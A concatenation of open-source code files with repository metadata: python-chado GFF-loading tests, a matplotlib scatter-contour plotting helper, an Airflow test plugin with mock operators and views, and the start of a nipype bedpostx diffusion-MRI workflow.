assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
        assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>target loc ok"
def test_load_gff_twice_addonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
        # Loading the same gff twice with add_only should raise an exception
        self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig", no_seq_compute=True)
        raised = False
        try:
            self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True, add_only=True)
        except Exception:
            self.ci.session.rollback()
            raised = True
        assert raised, "loading the same gff twice with add_only should raise an exception"
def test_load_gff_protein_id(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/ncbi.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], protein_id_attr="protein_id", no_seq_compute=True)
# CDS level protein_id
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="rna1537") \
.one()
assert rna_f.name == 'XM_008184899.2'
assert rna_f.uniquename == 'rna1537'
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
assert pep_f.name == "XM_008184899.2"
assert pep_f.uniquename == "XP_008183121.1"
# mRNA level protein_id
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="rna1539") \
.one()
assert rna_f.name == 'XM_008184894.2'
assert rna_f.uniquename == 'rna1539'
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
assert pep_f.name == "XM_008184894.2"
assert pep_f.uniquename == "some_prot_id"
def test_load_gff_nosource(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot_nosource.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
        assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 2, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
        assert len(rna_f.featureloc_collection) == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 2, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
        assert len(children) == 15, "mRNA relationships, child subfeatures"
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
        assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>target loc ok"
def setUp(self):
self.ci = ci
self.ci.organism.delete_organisms()
self.ci.analysis.delete_analyses()
self.ci.feature.delete_features()
# Make sure dbxref are deleted too
self._del_dbxref()
self.ci.session.commit()
def tearDown(self):
self.ci.organism.delete_organisms()
self.ci.analysis.delete_analyses()
self.ci.feature.delete_features()
# Make sure dbxref are deleted too
self._del_dbxref()
self.ci.session.commit()
|
{
"content_hash": "127b29a7169c938190decc0582c5f787",
"timestamp": "",
"source": "github",
"line_count": 1673,
"max_line_length": 224,
"avg_line_length": 57.75313807531381,
"alnum_prop": 0.659577110566026,
"repo_name": "abretaud/python-chado",
"id": "cb8efbf57e23f1773e16baff74bd67525b3c0dff",
"size": "96621",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/gff_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "84"
},
{
"name": "Python",
"bytes": "65493"
}
],
"symlink_target": ""
}
|
import numpy as np
import pylab as pl
def scatter_contour(x, y,
levels=10,
threshold=100,
log_counts=False,
histogram2d_args={},
scatter_args={},
contour_args={},
contour_lw={},
                    hist_bins=10,
ax=None):
"""Scatter plot with contour over dense regions
Parameters
----------
x, y : arrays
x and y data for the contour plot
levels : integer or array (optional, default=10)
number of contour levels, or array of contour levels
threshold : float (default=100)
number of points per 2D bin at which to begin drawing contours
    log_counts : boolean (optional)
        if True, contour levels are the base-10 logarithm of bin counts.
histogram2d_args : dict
keyword arguments passed to numpy.histogram2d
see doc string of numpy.histogram2d for more information
scatter_args : dict
keyword arguments passed to pylab.scatter
see doc string of pylab.scatter for more information
    contour_args : dict
        keyword arguments passed to pylab.contourf
        see doc string of pylab.contourf for more information
    contour_lw : dict
        keyword arguments passed to pylab.contour; when non-empty, line
        contours are drawn on top of the filled contours
    hist_bins : int
        number of bins for the 2d histogram
    ax : mpl axis instance
        used to update an existing plot.
"""
H, xbins, ybins = np.histogram2d(x, y, hist_bins, **histogram2d_args)
Nx = len(xbins)
Ny = len(ybins)
if log_counts:
H = np.log10(1 + H)
threshold = np.log10(1 + threshold)
    levels = np.asarray(levels)
    if levels.size == 1:
        # a scalar was given: generate that many levels from threshold to max
        levels = np.linspace(threshold, H.max(), int(levels))
# only plot points which fall outside contoured region
x_i = np.digitize(x, xbins) - 1
y_i = np.digitize(y, ybins) - 1
x_i[x_i < 0] = 0
x_i[x_i >= H.shape[0]] = H.shape[0] - 1
y_i[y_i < 0] = 0
y_i[y_i >= H.shape[1]] = H.shape[1] - 1
    # scatter bins up to the second level so no gap shows at the lowest band
    flag = (H[x_i, y_i] <= levels[1])
    if ax is None:
sc = pl.scatter(x[flag], y[flag], **scatter_args)
co = pl.contourf(H.T, levels,
extent=[xbins[0], xbins[-1], ybins[0], ybins[-1]],
**contour_args)
if len(contour_lw) != 0:
cf = pl.contour(H.T, levels,
extent=[xbins[0], xbins[-1], ybins[0], ybins[-1]],
**contour_lw)
else:
sc = ax.scatter(x[flag], y[flag], **scatter_args)
co = ax.contourf(H.T, levels,
extent=[xbins[0], xbins[-1], ybins[0], ybins[-1]],
**contour_args)
if len(contour_lw) != 0:
cf = ax.contour(H.T, levels,
extent=[xbins[0], xbins[-1], ybins[0], ybins[-1]],
**contour_lw)
    return sc, co
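if __name__ == "__main__":
    # Minimal usage sketch (illustrative, not part of the original module):
    # a dense correlated Gaussian cloud, drawn with filled contours over the
    # crowded centre and individual points in the sparse tails.
    np.random.seed(0)
    x = np.random.normal(size=10000)
    y = x + np.random.normal(scale=0.5, size=10000)
    scatter_contour(x, y, levels=8, threshold=50, log_counts=True,
                    hist_bins=40,
                    scatter_args=dict(s=2, color='k'),
                    contour_args=dict(cmap=pl.cm.Blues))
    pl.show()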
|
{
"content_hash": "6c813e0dd314aefc66d03e11380fa8d7",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 78,
"avg_line_length": 34.22352941176471,
"alnum_prop": 0.5256101753179787,
"repo_name": "philrosenfield/ResolvedStellarPops",
"id": "ac8be9ca9ac8a88e608b43d51d1a72834df6135b",
"size": "2909",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scatter_contour.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "356874"
},
{
"name": "TeX",
"bytes": "90575"
}
],
"symlink_target": ""
}
|
from flask import Blueprint
from flask_appbuilder import BaseView as AppBuilderBaseView, expose
from airflow.executors.base_executor import BaseExecutor
# Importing base classes that we need to derive
from airflow.hooks.base import BaseHook
from airflow.models.baseoperator import BaseOperator
# This is the class you derive to create a plugin
from airflow.plugins_manager import AirflowPlugin
from airflow.sensors.base import BaseSensorOperator
from airflow.timetables.interval import CronDataIntervalTimetable
from tests.test_utils.mock_operators import (
AirflowLink,
AirflowLink2,
CustomBaseIndexOpLink,
CustomOpLink,
GithubLink,
GoogleLink,
)
# Will show up under airflow.hooks.test_plugin.PluginHook
class PluginHook(BaseHook):
pass
# Will show up under airflow.operators.test_plugin.PluginOperator
class PluginOperator(BaseOperator):
pass
# Will show up under airflow.sensors.test_plugin.PluginSensorOperator
class PluginSensorOperator(BaseSensorOperator):
pass
# Will show up under airflow.executors.test_plugin.PluginExecutor
class PluginExecutor(BaseExecutor):
pass
# Will show up under airflow.macros.test_plugin.plugin_macro
def plugin_macro():
pass
# Creating a flask appbuilder BaseView
class PluginTestAppBuilderBaseView(AppBuilderBaseView):
default_view = "test"
@expose("/")
def test(self):
return self.render_template("test_plugin/test.html", content="Hello galaxy!")
v_appbuilder_view = PluginTestAppBuilderBaseView()
v_appbuilder_package = {"name": "Test View", "category": "Test Plugin", "view": v_appbuilder_view}
v_nomenu_appbuilder_package = {"view": v_appbuilder_view}
# Creating flask appbuilder Menu Items
appbuilder_mitem = {
"name": "Google",
"href": "https://www.google.com",
"category": "Search",
}
appbuilder_mitem_toplevel = {
"name": "apache",
"href": "https://www.apache.org/",
"label": "The Apache Software Foundation",
}
# Creating a flask blueprint to integrate the templates and static folder
bp = Blueprint(
"test_plugin",
__name__,
template_folder='templates', # registers airflow/plugins/templates as a Jinja template folder
static_folder='static',
static_url_path='/static/test_plugin',
)
# Extend an existing class to avoid the need to implement the full interface
class CustomCronDataIntervalTimetable(CronDataIntervalTimetable):
pass
# Defining the plugin class
class AirflowTestPlugin(AirflowPlugin):
name = "test_plugin"
operators = [PluginOperator]
sensors = [PluginSensorOperator]
hooks = [PluginHook]
executors = [PluginExecutor]
macros = [plugin_macro]
flask_blueprints = [bp]
appbuilder_views = [v_appbuilder_package]
appbuilder_menu_items = [appbuilder_mitem, appbuilder_mitem_toplevel]
global_operator_extra_links = [
AirflowLink(),
GithubLink(),
]
operator_extra_links = [GoogleLink(), AirflowLink2(), CustomOpLink(), CustomBaseIndexOpLink(1)]
timetables = [CustomCronDataIntervalTimetable]
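# Note (illustrative, not part of the original file): Airflow discovers
# AirflowPlugin subclasses like the one above either from modules placed in
# the $AIRFLOW_HOME/plugins folder or from packages exposing the
# ``airflow.plugins`` setuptools entry point; the class attributes above are
# what the plugins manager registers with the webserver and scheduler.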
class MockPluginA(AirflowPlugin):
name = 'plugin-a'
class MockPluginB(AirflowPlugin):
name = 'plugin-b'
class MockPluginC(AirflowPlugin):
name = 'plugin-c'
class AirflowTestOnLoadPlugin(AirflowPlugin):
name = 'preload'
def on_load(self, *args, **kwargs):
self.name = 'postload'
|
{
"content_hash": "2c836b96066dc7d48bebcd54a3275cdd",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 99,
"avg_line_length": 26.944,
"alnum_prop": 0.7354513064133017,
"repo_name": "apache/incubator-airflow",
"id": "bae3d93db4768d126ed035c2ea40b82acc3c509d",
"size": "4156",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/plugins/test_plugin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "69070"
},
{
"name": "Dockerfile",
"bytes": "2001"
},
{
"name": "HTML",
"bytes": "283783"
},
{
"name": "JavaScript",
"bytes": "1387552"
},
{
"name": "Mako",
"bytes": "1284"
},
{
"name": "Python",
"bytes": "5482822"
},
{
"name": "Shell",
"bytes": "40957"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from ....pipeline import engine as pe
from ....interfaces import utility as niu
from ....interfaces import fsl
from ....algorithms import misc
# backwards compatibility
from .epi import create_eddy_correct_pipeline
def transpose(samples_over_fibres):
import numpy as np
a = np.array(samples_over_fibres)
return np.squeeze(a.T).tolist()
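# Illustrative note (not part of the original source): `transpose` flips a
# per-slice list of per-fibre output files into a per-fibre list of
# per-slice files, e.g.
#     [[th1_a, th2_a], [th1_b, th2_b]] -> [[th1_a, th1_b], [th2_a, th2_b]]
# so that each fibre's slices can be merged separately by fsl.Merge in the
# merge_and_mean sub-workflows below.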
def create_bedpostx_pipeline(name='bedpostx', params={'n_fibres': 2, 'fudge': 1, 'burn_in': 1000,
'n_jumps': 1250, 'sample_every': 25, 'model': 2,
'cnlinear': True}):
"""
    Creates a pipeline that does the same as the bedpostx script from FSL -
    calculates diffusion model parameters (distributions not MLE) voxelwise
    for the whole volume (by splitting it slicewise).
Example
-------
>>> from nipype.workflows.dmri.fsl.dti import create_bedpostx_pipeline
>>> params = dict(n_fibres = 2, fudge = 1, burn_in = 1000,
... n_jumps = 1250, sample_every = 25)
>>> bpwf = create_bedpostx_pipeline('nipype_bedpostx', params)
>>> bpwf.inputs.inputnode.dwi = 'diffusion.nii'
>>> bpwf.inputs.inputnode.mask = 'mask.nii'
>>> bpwf.inputs.inputnode.bvecs = 'bvecs'
>>> bpwf.inputs.inputnode.bvals = 'bvals'
>>> bpwf.run() # doctest: +SKIP
Inputs::
inputnode.dwi
inputnode.mask
inputnode.bvecs
inputnode.bvals
Outputs::
outputnode wraps all XFibres outputs
"""
inputnode = pe.Node(niu.IdentityInterface(fields=['dwi', 'mask',
'bvecs', 'bvals']), name='inputnode')
slice_dwi = pe.Node(fsl.Split(dimension='z'), name='slice_dwi')
slice_msk = pe.Node(fsl.Split(dimension='z'), name='slice_msk')
mask_dwi = pe.MapNode(fsl.ImageMaths(op_string='-mas'),
iterfield=['in_file', 'in_file2'], name='mask_dwi')
xfib_if = fsl.XFibres(**params)
xfibres = pe.MapNode(xfib_if, name='xfibres',
iterfield=['dwi', 'mask'])
make_dyads = pe.MapNode(fsl.MakeDyadicVectors(), name="make_dyads",
iterfield=['theta_vol', 'phi_vol'])
out_fields = ['dyads', 'dyads_disp',
'thsamples', 'phsamples', 'fsamples',
'mean_thsamples', 'mean_phsamples', 'mean_fsamples']
outputnode = pe.Node(niu.IdentityInterface(fields=out_fields),
name='outputnode')
wf = pe.Workflow(name=name)
wf.connect([
(inputnode, slice_dwi, [('dwi', 'in_file')]),
(inputnode, slice_msk, [('mask', 'in_file')]),
(slice_dwi, mask_dwi, [('out_files', 'in_file')]),
(slice_msk, mask_dwi, [('out_files', 'in_file2')]),
(slice_dwi, xfibres, [('out_files', 'dwi')]),
(mask_dwi, xfibres, [('out_file', 'mask')]),
(inputnode, xfibres, [('bvecs', 'bvecs'),
('bvals', 'bvals')]),
(inputnode, make_dyads, [('mask', 'mask')])
])
mms = {}
for k in ['thsamples', 'phsamples', 'fsamples']:
mms[k] = merge_and_mean(k)
wf.connect([
(xfibres, mms[k], [(k, 'inputnode.in_files')]),
(mms[k], outputnode, [('outputnode.merged', k),
('outputnode.mean', 'mean_%s' % k)])
])
# m_mdsamples = pe.Node(fsl.Merge(dimension="z"),
# name="merge_mean_dsamples")
wf.connect([
(mms['thsamples'], make_dyads, [('outputnode.merged', 'theta_vol')]),
